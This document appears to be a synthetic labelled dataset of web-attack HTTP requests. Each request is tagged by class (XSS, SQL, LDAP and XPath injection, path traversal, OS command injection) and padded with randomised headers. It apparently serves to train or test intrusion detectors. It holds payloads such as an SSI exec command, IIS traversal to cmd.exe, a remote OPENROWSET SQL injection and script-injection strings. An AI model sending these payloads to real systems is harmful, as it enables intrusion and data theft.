Last-Modified: Tue, 12 Sep 06 05:55:56 UTC
Host: www.deon.fr
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, deflate
Accept-Language: *
Cache-Control: min-fresh=6643
Client-ip: 171.88.48.143
Cookie2: $Version="7"
Date: Thu, 20 Oct 05 11:22:17 GMT
ETag: "QQY_.zvrgninbUH8uvt"
Expect: 4tksenn1=dexsrl4s;caevs=w60etc
From: YHtcdN@wRae.uk
If-Modified-Since: Sat, 25 Nov 06 24:42:09 GMT
If-Unmodified-Since: Thu, 24 Mar 05 01:21:12 GMT
If-Match: "Log6IoplvEnqVR7d"
If-Range: "YpKTyoxuyfSrntn_t"
Max-Forwards: 31
Pragma: o=lSH5ett
Proxy-Authorization: Basic b3FoYW56ems6OTdpbG8=
Authorization: NTLM MnJtUzd5ZUlpYnVrMGRjYW1hc1JvT2VlZXBvb25tdGlpZHJhdA==
Range: 7-1281,22479-
Referer: http://www.Lanfref.de/croe2der/fcomo/olu8aouC/hlsHe/ecfcpa.pdf
TE: trailers
User-Agent: ie_._bm http://www.updunk.uk
UA-Disp: 3250,7812,32
Via: eewkn/5.9 www.boalftAi.png
Transfer-Encoding: a96ahi; iasoiq=3huod
Warning: 524 216.140.150.200 "ytojircesetlOqieus" 
----: --------------------

baerta4cacT=74418&nlecrab8= >etl&nT3ritpcL8e=602633633&rueotn85ttJh4c=<!--  #exec cmd="c:\progra~1\tlt5d\dxhbcadt\e7.exe     d:\Gknvha\www.riatta.org\neb\database.mdb     /x    exporttofoxpro"-->&at4tnn1f7b=mol t3h&i7257e2j4nrr=A&tmmcRSa=26&isShl2a=sWfsktt

End - Id: 40251
Start - Id: 48285
class: XSS
PUT /tEUz_I7VQhBtN/Eeori7eeeTiaiaio/entb/nosohlsdoheiuuneoiea/coatpneiemrmcdnawrl/bDiJa/2PLO71HzD/NfbcsIind2yJGq/oZr.sh? HTTP/1.0
Content-Length: 156
Content-Language: ca8a,ata,ieseo
Content-Encoding: compress
Content-Location: http://www.aiD9ib.uk/ictda0p.jpg
Content-MD5: NnNhZDU3ZU5Gc2FjZWxObw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Sep 08 08:12:43 CET
Last-Modified: Sat, 22 May 04 09:44:14 CET
Host: www.sueeeiwNc4.uk
Connection: aaAas
Accept: */*;q=0.5
Accept-Charset: iso-10646-ucs-2, x-mac-chinesesimp;q=0.4, x-mac-turkish;q=0.3, koi8-r
Accept-Encoding: identity, compress;q=0.3, gzip
Accept-Language: aiW-R, gwsvdn-idas2omi;q=0.9, dSEd-tdh, w5Ae5l-aceh, ne1a-o;q=0.8
Cache-Control: max-stale
Client-ip: 145.84.197.68
Cookie: t92erfitn3f=<xml  id  =   "     X    "  ><a ><b   >&lt;script>[alert('r3ty7e');]&lt;/script  >;</b    ></a ></xml  >;-xv_execDGoLO=aRwne nteFmt6oE;passwdjfDw4Kwa4sock_streamvar=canjdt
Cookie2: $Version="1"
Date: Sat, 03 Nov 07 16:51:31 UTC
ETag: W/"qxvFh27SK8NhgK2"
If-Modified-Since: Wed, 12 Oct 05 19:13:24 GMT
If-Unmodified-Since: Fri, 19 Sep 08 22:43:31 UTC
If-Match: "cB@CH2r_uGvDf8_QbHqv"
If-None-Match: *
If-Range: *
Max-Forwards: 697
MIME-Version: 2.7
Authorization: nmstp rBcteaaa=7reowe
Referer: /6nruqlr/eYhmgtth/GtU0et.conf
TE: deflate;q=0.2,trailers
User-Agent: e7esuitd (tnOt9qQB; ugK7wMA; gDyhLhBNw; iUnpJiOI; nY_6vjoHB5)
UA-Disp: 2934,2981,16
UA-OS: Windows NT
Transfer-Encoding: identity
Upgrade: uitmh/9.8, klde/1.2
----: -----------------------

Aenu8BhHoen6c=hko2ost5plt&lvyeaao=f n@o5&suhtao0jk=erajoAE7rar3gai&anUte1ofe=gT&awmitg3t4lc=eyootoipwfqsAi&Nfsado3esl=ddam&auOV_ZnullW-=588&ndoanta82o=rh5

End - Id: 48285
Start - Id: 49856
class: XPathInjection
GET /nta5oao.htm?umaHblR=636+or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+1790%3D&u.betweenoPqMhome=oIoyisN0ex11s&sqA8tteaPmhss=4UJUN&dOx@PystyleMLO6U=nstylehusrWde&MYm21=17091&hwrqOuS2=1c%26&zgownecrunstO=86624822&inl6hbofds=eeogS&oikaoelnTo1p=z5tesemidsasptrlc&yeyea=ediwee5u&N7@THpzKHf=Sar&wXk0mail.zmj8L=epeW HTTP/1.0
Host: www.ctceClrud.be
Connection: Tboterrs
Accept: application/zip
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: eih-trEd;q=0.9
Cache-Control: min-fresh=0201
Client-ip: 27.230.20.137
Cookie: 2Y.QBTuf8=r ;akllNeLxsehl=sc ersstdinaidH
Cookie2: $Version="51"
Date: Wed, 21 Nov 07 17:14:02 GMT
ETag: "fkNhvCS9mNXdCe20Q7UR"
Expect: 100-continue
From: oyrua@eNee.com
If-Modified-Since: Sun, 11 Apr 10 15:14:32 GMT
If-Unmodified-Since: Wed, 02 May 07 07:32:47 CET
If-Match: "oR8nchPj3NMT-Mwd3ik"
If-None-Match: *
If-Range: Thu, 20 Sep 07 11:58:31 CET
Max-Forwards: 390
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: xlE0 aelJ=NEonemxl
Range: 451065-8,-1181,-282
Referer: http://www.Sc8sser.org/eimotaid/mrymuaA/8uaosau/semx1/ttpritR.php
TE: deflate
Trailer: Pragma
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 9.5; lu-Pf; rv:0.2.0) Gecko/24946921
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 967x245
Via: 9.1 62.8.231.97
Transfer-Encoding: identity
Upgrade: soar/0.1
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 246.212.130.181
X-Serial-Number: 5095784293385
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49856
Start - Id: 37564
class: LdapInjection
POST /mdetb5bt1ewrlTo7t/onptinofnnEwi/f3e.Qg/ewu68ac.gdJmV/nyRe.tiff? HTTP/1.1
Content-Length: 203
Content-Language: lehc
Content-Encoding: compress
Content-Location: http://ETma.ch/5uni/rrees2e.js
Content-MD5: N2FvaGVybHJ1ZXZvYWw3cg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Mar 04 11:03:05 GMT
Last-Modified: Tue, 03 Oct 06 12:40:57 UTC
Host: 215.95.250.44:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: s-sAhein, sitnke-E, ltvET-laee;q=0.4, rroa-eihenvwn, gaXhty-r;q=0.0
Cache-Control: only-if-cached
Client-ip: 7.129.128.89
Cookie: sOomnmz4s=tihr7ue;4iurcleomtdsh5E=QaeonullkfJt];lsDy=174655;We.WWphpcuj5X-=203
Cookie2: $Version="86"
Date: Fri, 06 Aug 04 07:40:11 GMT
ETag: W/"enilrOj7ei_-Z4H8rKq"
Expect: liIlS
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sun, 13 Jun 04 02:37:47 CET
If-Unmodified-Since: Tue, 02 Nov 04 05:12:08 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Mon, 16 May 05 05:58:40 GMT
Max-Forwards: 526
MIME-Version: 9.9
Pragma: sh6h5t='haceYer'
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: NTLM aWVubmxHb3JldmZSZ2lsMWlhTmhDbHNxaGk3ZGhhb0R1b2lvTDh4dnNjTk1lWW90
Range: -74,-46159,08-370587
Referer: /ouuNtEoq/pi6BsHw/puaaom/hdlen.cgi
TE: deflate,chunked;q=0.5,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.6 (Machintosh; U; PPC Mac OS X 8.7; be-ee; rv:3.6.7) Gecko/73448237
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1680x065
Via: 6.5 www.uf7ept5.jpeg, eAsedr/7.2 www.9ttm.css
Transfer-Encoding: compress
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 01594707388200191754
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2Eo8lheeO=jgceetcdpnsfpro&zoN=g&otei=384&R8eettP0leFk=omf&oe=05)(&(objectClass=lh6e)(|(sn=   cewo)(cn=m  J*))&s0sufnSsamkAw=]'srb&aSpotLth=nen~&w3GSu=sSehN&wcb=0168894

End - Id: 37564
Start - Id: 36871
class: LdapInjection
GET /r4w-rXhRMT8fZ_hy.js?Nowdtpwemsua=9791096&Ij5JvEh1=srkX4Lk4NA9&hE0D0d.NA=zotTa0A&G9A_netcatopenK=701919&ir8pqe7zne=onjptootPd&aotseEyiieSR=11ivK&0antl96c5=0237134920&adsNgen=arXXrl67%40wX&Tvzc=isnt9yNYteip&la3iIlheeuh=yoetcipeiorece&dxaEca5iftcve=1447231069&NlgyXvYmlHEf=cj60hiyznsmNsakaub&su=eiybSan8hlb&ic7aiIqe9ttreTc=a3%29u+8eheexec&tb2atsAve3qhrdw=80225886 HTTP/1.1
Host: 124.128.125.184:61
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: hneue)(| (z1eei=*)
Accept-Language: wTfyb9-ez, UtLrbh-I;q=0.5, 9-Imoyc
Date: Sat, 03 Jul 04 03:40:05 CET
Expect: 100-continue
Max-Forwards: 4
Pragma: no-cache
Authorization: Basic NWFBaWtldDpwdGVkemh0
Referer: http://3lmhe.gov/r0fhwHrv/sghyfwg.gif
User-Agent: Mozilla/8.2 (compatible; Eht8Ignlil; Windows NT; aaWie)

null

End - Id: 36871
Start - Id: 45309
class: PathTransversal
GET /oWwQ5Yqh.swf?Al5er=iSnon&nhtf22cbf4tfre=609&ele=20&lnr=connectmeR&DShttpCKjHEbfPF=4317672&rb1He7baan=7997290&3inni=7628769&iewtl3eTent2jrs=ci&f6Oer4o9ssebj=1uenruxd&NPfTNYnstdinWY=Jyahdei1jxESaOwawt&h9lN8stsu=oiOn&7ehcEentrc2cne=zzrdv&ruiembo=4e1ttwebpsiLier%27D&irRiIiagc=o7dsjsehEh68esrt&evIidu7=2 HTTP/1.0
Host: 61.110.145.5
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.3, koi8;q=0.4, cp-950;q=0.3, iso-8859-6;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=2591
Client-ip: 149.238.74.231
Cookie: slolh=5wfvhO%u9He;knIV=\autoexec.bat;S@sCoF4=8ahni;uoefu=1o+;4
Cookie2: $Version="9"
Date: Fri, 14 Aug 09 12:41:57 UTC
Expect: 100-continue
From: EYChns@iihtspc.com
If-Modified-Since: Fri, 11 Dec 09 20:52:51 UTC
If-Unmodified-Since: Sun, 01 Nov 09 11:00:58 GMT
If-Match: "fy-Q_fnpZqLNImAKv3@"
If-None-Match: "sgjB3J9_82XgF5dMDR"
If-Range: *
Max-Forwards: 8216
MIME-Version: 6.6
Pragma: no-cache
Authorization: Digest algorithm=MD5-sess
Referer: /lstuht/xoqiyj/nstr/eanjyb.tiff
TE: gzip;q=0.1,trailers
Trailer: Authorization
User-Agent: Mozilla/2.5 (X11; U; Linux i586 2.2; ni-re; rv:5.5.6) Gecko/30677236
UA-CPU: MIPS
Via: ster/2.7 www.ohaemi4t.css
Transfer-Encoding: compress
Warning: 979 26.249.74.121 "eeOT7esu" 
X-Forwarded-For: 104.114.249.196

null

End - Id: 45309
Start - Id: 42304
class: SqlInjection
GET /tNiweits/pRdaI_7GZMe8/sywgd/ioirelzifooaNt/rtbnnr9a/Aiee/u3ems/pJ1zQngCFe8HKy2/5icL8BO3InetcatUmetabxh/uIeeOewsvAw/d.PRpzcQFEJRi3IXNq/1SXyOMgdCZt_i5VIi9.png?1ZnV=%3B+insert+++into+++OPENROWSET%28++++%27SQLoledb%27%2C%27uid%3DPsem%3Bpwd%3DoydtuE%3BNetwork%3DDBMSSOCN%3BAddress%3D98.199.176.215%2C1433%3B%27%2C%27select+*+++from+++_sysdatabases%27+++%29%3B++select+*++++from+LinkedOrRemoteSrv1.master.dbo.sysdatabases&ebnYoit=jdeeu HTTP/1.0
Host: www.iochrtxc.net:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.0, hz-gb-2312;q=0.8, gb2312, iso-8859-1;q=0.0
Accept-Encoding: compress;q=0.9, deflate;q=0.8
Accept-Language: *;q=0.4
Cache-Control: dsr='etno'
Client-ip: 37.43.143.81
Cookie: 1st1tFdska=iiumesIe;nkedcaytni7a=ddadmin;Enro1f=5;ndimam4dubT=odabme cs;ccgj5t=e0v
Cookie2: $Version="871"
Date: Tue, 12 Apr 05 04:16:06 UTC
ETag: "pTdUOuVuAksJznPB"
Expect: eSOo=Euhs
From: ebsew@sn8ns6e.de
If-Modified-Since: Sun, 19 Sep 04 19:46:45 GMT
If-Unmodified-Since: Wed, 06 Oct 04 06:18:07 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Oct 04 24:38:59 GMT
Max-Forwards: 2
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: b2tam rguj=eenzIhf
Authorization: Digest qop=yewizi
Range: -568889,-588214
Referer: http://www.ccgrrmhb.fr/wnHu8tl/hh6sqoer/etoa4/tedsH5.cgi
TE: deflate;q=0.8
Trailer: If-Range
User-Agent: Rnsteailesdsstloq
UA-CPU: Sparc
UA-Disp: 695,8049,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5338x078
Via: ciay/1.9 www.ifeK.html
Transfer-Encoding: compress
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 720 www.EuHgp.tiff "rnts" 
X-Forwarded-For: 74.6.222.203
X-Serial-Number: 807714416153290560
----: -------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42304
Start - Id: 44173
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 40.189.1.52
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp
Accept-Encoding: *
Accept-Language: tmajae-zNH, aiersU-doe, t-sooil;q=0.2
Cache-Control: no-cache
Client-ip: 180.201.53.124
Cookie: tmeta50document4G-6=pix_pxXbLf-;dVWmLPwB=3897805590;meiDtaw=)
Cookie2: $Version="987"
Date: Wed, 21 Jan 09 24:52:25 CET
ETag: W/"aTOdrmXsUZHyRCr-F"
Expect: 100-continue
From: a6ssEboa@0sqFIsecq.uk
If-Modified-Since: Wed, 16 Apr 08 16:49:15 GMT
If-Unmodified-Since: Mon, 07 Jan 08 22:52:19 UTC
If-Match: "wQRFn95bknpgijB"
If-None-Match: "SzWwgNJNdiIahrV"
If-Range: *
Max-Forwards: 5867
MIME-Version: 3.5
Pragma: etSlte=gi
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: 1mAes ohsnlr=eefi
Range: 5-,-97,-5
Referer: /Clzvr.swf
TE: deflate;q=0.9,trailers,trailers
Trailer: Upgrade
User-Agent: bulbCD9e http://www.sldt.it
UA-CPU: Sparc
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 389x154
Via: 0.6 252.49.31.229:7678
Transfer-Encoding: compress
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 195.218.223.142
X-Serial-Number: 386658457153334430
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44173
Start - Id: 42319
class: SqlInjection
GET /oueuiedj.jpeg?ynmkbpTil=wCN9i_&SYd3NaMVO=sh&Ffwbnibnr=g5EPj&suar1sxwnehsyel=acceptg&oilesd=hmio&NMkWu9=n%24aemCcao5node&ielzigastqa1aeb=++++OR+2+++++%3E+1&services@LG=%3FconnectAbini&peDleaoaElrj=nca HTTP/1.0
Host: 118.132.26.224
Connection: keep-alive
Accept: text/*;q=0.9
Accept-Charset: x-mac-hebrew;q=0.0, x-mac-ce;q=0.5, x-mac-chinesesimp;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 64.206.153.107
Cookie: wrs=ca|
Cookie2: $Version="97"
Date: Sat, 24 Apr 10 03:39:11 UTC
ETag: "TofU@QbCUF13A_Qc"
Expect: sEeh=gef1
From: vtsibh@nsti.biz
If-Modified-Since: Sun, 24 Dec 06 23:35:32 UTC
If-Unmodified-Since: Thu, 20 Apr 06 23:04:26 CET
If-Match: *
If-None-Match: *
If-Range: "34tX5k06-tS.PcRqB"
Max-Forwards: 0146
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Digest cnonce="sli9ah"
Range: -36
Referer: http://e3gnjii.de/Enek.php4
TE: trailers,deflate;q=0.8,trailers
Trailer: If-Match
User-Agent: Mozilla/0.3 (X11; U; Unix 7.1; oa-to; rv:9.1.7) Gecko/08040149
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4371x6437
Via: 8.4 www.6sxpebn.js
Transfer-Encoding: gzip
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42319
Start - Id: 37261
class: LdapInjection
GET /oieIemMoRmiblptib/V7nSxH/7aadon/ojuodrbdoEd1laWemsna/irtqylBtht/uA_IR/edeeweticut8demIi/W7iL/aA0-unY3Y.htm?ym4eTee92nsin=188801874&izalY91eaR=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&t9iNgah=eGY&n454i2y4ai=tjnttairiiteenM HTTP/1.0
Host: www.xoiSrd1tg.net:837
Connection: keep-alive
Accept: video/mpeg, video/*;q=0.1
Accept-Charset: cp-950, cp-932, utf-7, iso-10646-ucs-2;q=0.1, euc-kr
Accept-Encoding: 
Accept-Language: i-vdp7eo
Cache-Control: max-age=29761
Client-ip: 33.58.126.148
Cookie: bogdct=aRr-Q7;shtmSarrks=atw c\e8noh7
Cookie2: $Version="99"
Date: Sun, 23 Dec 07 02:08:00 CET
ETag: W/"bNc0uNmABEHOP3zCY98w"
Expect: 100-continue
From: tlclo@pOIec.be
If-Modified-Since: Thu, 07 Oct 04 12:39:52 CET
If-Unmodified-Since: Mon, 30 Oct 06 23:51:08 CET
If-Match: "MgcLm9WgaJ-fwztb"
If-None-Match: *
If-Range: *
Max-Forwards: 850
MIME-Version: 9.7
Pragma: r9bSoi='r'
Proxy-Authorization: oetuts 0iernty=iio4tep
Authorization: Digest opaque="Onooem"
Range: 66998-,06384-073,7-
Referer: http://www.ebc9d.gov/yaumiEy.sh
TE: gzip;q=0.6,chunked;q=0.1,chunked;q=0.4
Trailer: Expect
User-Agent: xtsiraph8/1.0.4
UA-CPU: 68000
UA-Disp: 785,4501,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1371x144
Via: FTP/8.4 116.93.217.116
Transfer-Encoding: gzip
Upgrade: d5ts/6.4
Warning: 942 43.44.236.191:46 "btf9mwO" "Mon, 04 Sep 06 14:47:25 CET"
X-Serial-Number: 4915309492060646563
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 37261
Start - Id: 42809
class: OsCommanding
GET /l8eathses/obsle5UG1G4N1EGYMsku/aotamanAoeara/tmzUolOrmochafjX-/tbswja.asp?moriiueanytm=kiio&srhrSqdsa=1r5p7&nmseai=ji&yxm=6&abese6Etiuir3nT=22554197&oid=nEnnullx&UZ@K=fveech2ameoc&eynnqwah5nonf=47598033&-Gnc8FB=og%3D9%24 HTTP/1.0
Host: 103.97.33.116:13036
Connection: keep-alive
Accept: text/xml, application/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: Tis='Ecgyfjuc'
Cookie: dftp3ATu4e9R=6nDG7gVJv;wtlfmoehre5=204.118.84.77   |    cmd.exe /s
Cookie2: $Version="52"
Date: Mon, 23 May 05 13:07:42 CET
Expect: 100-continue
From: aErd@0efeaeh.be
If-Modified-Since: Thu, 15 Oct 09 24:19:28 UTC
If-Unmodified-Since: Sun, 21 Sep 08 20:05:59 GMT
If-Match: *
If-Range: Mon, 05 Oct 09 15:13:00 CET
Max-Forwards: 283
MIME-Version: 3.6
Proxy-Authorization: NTLM c2VlYW9tU0duZXlpd2Nzbm1nOG8yYXJwck82bmxlZ291bmV3cnMwZWg5
Authorization: NTLM dHNvZWhvY2VlY29hMHpTYUFwNmNkZ3J0cnRkdWF1bjRlYWhxa25hb25xZXlpaWd1
Referer: http://www.t9frro.fr/mdef/oe0es/itnwd/arnw0/qeit.cgi
TE: deflate;q=0.0,deflate;q=0.1,deflate
User-Agent: Mozilla/4.9 (Windows; U; WinNT 4.9; dE-sm; rv:8.2.4) Gecko/86224397
Via: 9.3 www.oeefaec.css, 6.9 118.192.175.115
Upgrade: 5ysrea/7.9, edh/7.4, bcIoo/0.0, 3rpop/2.3

null

End - Id: 42809
Start - Id: 47731
class: XSS
GET /w5/lur0heFniekneitu/isphe/i13c8jb/vCYg8insertnRunion/ntwoctetu3e/n9x.cfm?h3ehtotrr=%3Cxml++src++%3D++++%22++javascript%3A+++%5Balert++%28%27Iedt5ua%27%29%3B%5D++%22+%3E&xls=dkw5nedshutdownttaLi+ HTTP/1.1
Host: 39.35.62.179:424
Connection: keep-alive
Accept: text/*;q=0.3, application/*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ape-nsna2Ud;q=0.7, r-yw00, i-nugr, O7soae-t;q=0.7
Cache-Control: only-if-cached
Client-ip: 98.106.69.46
Cookie: anxhtixi9se2I=gsytiieleeQ;eth9eedkvo3he=Eln8ecironhnmiotO;olpdo7vhEti61=r3r(;pdbNdmSauSt=e(;AVmiaeTtft4erce= l;igiogsd6nneague=aeVR4
Cookie2: $Version="02"
Date: Sun, 30 Oct 05 05:23:19 GMT
ETag: "NjsmIW8.0lHCNMiSrPa"
Expect: 100-continue
From: rlNe@ecetad6.fr
If-Modified-Since: Wed, 24 Dec 08 07:45:19 UTC
If-Unmodified-Since: Thu, 29 Jun 06 06:33:45 GMT
If-Match: *
If-None-Match: *
If-Range: "XkyfedRFp.bcT_U"
Max-Forwards: 2
MIME-Version: 2.5
Pragma: dwhjmsh=alInyo
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: Digest uri=http://04aR.st/IpidxdeT/7eqeo/dqn0/lnugf/Dleaa.mdb
Range: 9-,057-2,501963-763
Referer: http://sEt53c.st/ovrir/r9mh.asmx
TE: chunked
Trailer: Date
User-Agent: Mozilla/9.6 (Windows; U; WinNT 4.5; eI-db; rv:9.3.7) Gecko/24171248
UA-CPU: PowerPC
UA-Disp: 2301,334,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0710x100
Via: FTP/0.2 85.95.224.243, HTTP/5.5 59.106.238.143, 7.8 www.merseo.jpg
Transfer-Encoding: gzip
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 499 www.ObTif.js "Thryti" 
X-Forwarded-For: 75.33.202.51
X-Serial-Number: 4647355
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47731
Start - Id: 44362
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.f9eitea.st
Connection: keep-alive
Accept: application/zip, audio/x-wav
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=65
Client-ip: 85.70.71.191
Cookie: mefdurnznnse=o-z;LXFnhd=pottv)
Cookie2: $Version="4"
Date: Thu, 14 Sep 06 02:20:15 CET
ETag: "Mp0.89pM9u@RmCsjjuH"
Expect: eont=ltkcnd;tS3s
From: ks7mao@6esnaehk.it
If-Modified-Since: Mon, 05 Apr 10 24:42:55 GMT
If-Unmodified-Since: Fri, 09 Nov 07 02:11:29 UTC
If-Match: *
If-None-Match: *
If-Range: "usvv7nHn.nQv.BAuoaKB"
Max-Forwards: 7402
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest response="750EEeFddf3CD4eDAAABC5d54CeAD4BE"
Range: -126597,56874-704
Referer: http://www.shdtd.it/seEe7e/DtetYk/nasx/retrk.avi
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 3.2; ny-au; rv:4.4.3) Gecko/71989543
UA-CPU: x86
UA-Disp: 116,364,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 673x399
Via: 5.6 214.72.193.116
Transfer-Encoding: compress
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44362
Start - Id: 38400
class: LdapInjection
GET /aIzN8h/ao/iOx@PQKSo.mdb?PKixutelnetO=+7rthaetms&rebelar=06969520&tzhO8=ungzoNUUXjs&xnfddtl=r9.DRhSXBT&ngvsse=2&icTnUaswmnut=Ruhhol&blQ.Lh0=GiirfiE5qrBv&ra=ia1hincludeco&ane4aeoeut=442550014&metqwaiaarn=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ihuxeinotolrnEt=od8eAhsvokf9qh&nvanr6tf1isg=NntcnurTpu HTTP/1.1
Host: 32.211.240.161
Connection: lernn
Accept: image/*;q=0.5, application/zip, text/*;q=0.6
Accept-Charset: x-mac-japanese;q=0.8
Accept-Encoding: 
Accept-Language: El2n-emd, p-de, en5-h
Cache-Control: max-age=99379
Client-ip: 214.154.43.120
Cookie: muae=oby;Mnodeyposition2=sze;f_RZHJG96cS=170351
Cookie2: $Version="47"
Date: Sat, 17 Sep 05 23:33:25 GMT
ETag: W/"PEY2C1nlHh2cP9Zzo"
Expect: 100-continue
From: bahiT@etI8o.net
If-Modified-Since: Thu, 12 Mar 09 18:13:00 GMT
If-Unmodified-Since: Wed, 28 Nov 07 13:09:17 GMT
If-Match: *
If-None-Match: "aArLISgjwm7L9c4IRDy"
If-Range: Mon, 10 Jan 05 24:27:15 UTC
Max-Forwards: 1
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic Z25peXFzaDpld3NkcnA=
Authorization: Digest nonce
Range: -96373
Referer: /nashvds/thwho/PeIh0go/oSms.tiff
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.6 (Machintosh; U; PPC Mac OS X 1.5; wa-eo; rv:9.7.9) Gecko/66753682
UA-CPU: Sparc
UA-Disp: 011,9897,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7262x7113
Via: 4.8 88.241.245.135:24, 8.1 108.187.220.135:5
Transfer-Encoding: gzip
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38400
Start - Id: 37357
class: LdapInjection
GET /tFpXx/3Heits3efeho83.tiff?hGVPjrcp=uPPXtS&oe6dr=5n5iaN&rnhgmeoa=qCdfp3i&Blocationbody0=ea%3Bs&smu8d0wnmtsiiqo=ieg1q1&yaazidsabwTUe1=imgehvusr&rdlmtlNfliqnoga=imepl&bmyeydrvtakc=607&euouixauh4nIitn=+nprrnoElai&mFvYfVUdh0=nPo&inmto4cu1no=ft7eeenatniNt8ee8 HTTP/1.1
Host: www.rOeihi.gov:4336
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: rfa)(&(objectClass=9d*)
Cache-Control: max-age=01045
Client-ip: 212.91.230.42
Cookie: hhoqozkstg8xsh=02;irlni=rcpxeo0twhe7cr
Cookie2: $Version="87"
Date: Tue, 07 Aug 07 06:14:05 GMT
ETag: "_hZuj7xV2Cnv6KHHV4bB"
Expect: 100-continue
From: 6eoetp@selEd.fr
If-Modified-Since: Sat, 15 May 04 24:46:18 GMT
If-Unmodified-Since: Sun, 23 Aug 09 11:43:56 CET
If-Match: *
If-None-Match: *
If-Range: "KhD1ul0kWhAi@b5Q"
Max-Forwards: 3
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic MTdjZTQ6c2xvcw==
Authorization: mancmX tsctro=miying2
Range: 257723-74,-66
Referer: /hZte.shtml
TE: trailers,trailers,gzip;q=0.8
Trailer: Transfer-Encoding
User-Agent: uh7CGSYK http://www.frshe0.org
